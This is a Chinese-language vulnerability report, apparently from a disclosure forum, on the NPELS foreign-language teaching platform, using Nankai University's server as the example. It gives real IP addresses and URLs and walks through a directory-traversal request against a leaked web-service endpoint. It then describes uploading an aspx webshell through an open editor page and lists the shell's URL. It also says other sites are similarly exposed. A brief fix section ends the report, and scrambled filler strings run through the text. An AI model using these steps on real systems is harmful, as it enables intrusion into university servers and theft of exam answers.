新理念外语网络教学平台文件上传漏洞

admin

好多大学都在用这个教学平台，这个漏洞会导致直接拿到试题答案，甚至作为跳板继续渗透进入学校其他服务器中

详细说明：
' F8 z% s" q$ G6 C* k+ Q2 F
以南开大学的为例:
http://222.30.60.3/NPELS
2 X% M+ t6 R0 X' Y, z' l* XNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
  p: R" s7 \& P* i# E1 A<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
, w( h0 a7 h; V8 M$ U: |</setting>
及版本号
( P2 e$ u% }- D) P3 Q7 B<add key="TVersion" value="1, 0, 0, 2187">
+ O' `" b8 }! `0 T, u" B</add>
8 P1 P6 n1 ^/ O: q* B0 \+ u5 [; ]6 _直接访问
http://222.30.60.3/NPELS/CommonService.asmx
使用GetTestClientFileList操作，直接 HTTP GET 列目录：
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
) e$ m2 I5 N8 {进一步列目录（返回的网页很大，可以直接 wget 下来）
http://222.30.60.3/NPELS/CommonS ... List?version=../../

发现
6 Q( G% r+ V7 E5 B7 j' Fhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
$ |, t. Q0 g4 U: G6 @' ^: N$ M可以上传，直接上传aspx木马即可，不需要改后缀名或者文件头
上传后继续列目录找到木马地址直接访问即可

  a' F, z) i* r" |OOXX

Google "新理念外语网络教学平台" 测试了几个其他的站，都有类似的列目录上传方法
漏洞证明：
) W6 x1 k, G7 ?7 n
3 B  K, y4 ^( J* w列目录：
' L) [! m+ m- o! ]" y: `http://222.30.60.3/NPELS/CommonS ... List?version=../../
文件上传：
0 _" t- ^% i6 O. n9 x! n/ W% U2 V! bhttp://222.30.60.3/npelsv/editor/editor.htm

7 [0 x# l% t4 T( w, Y" M* C, S上传木马：
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx

修复方案：
0 l7 ?/ O& B- G' I! u8 k, \! |  i/ e好像考试系统必须使用 CommonService.asmx
最好配置文件加密或者用别的方式不让它泄露出来
并且检查或删除各上传入口，像 http://222.30.60.3/NPELS/Upload.aspx 一样​
( b5 _1 a; E8 s9 e% ~. @) e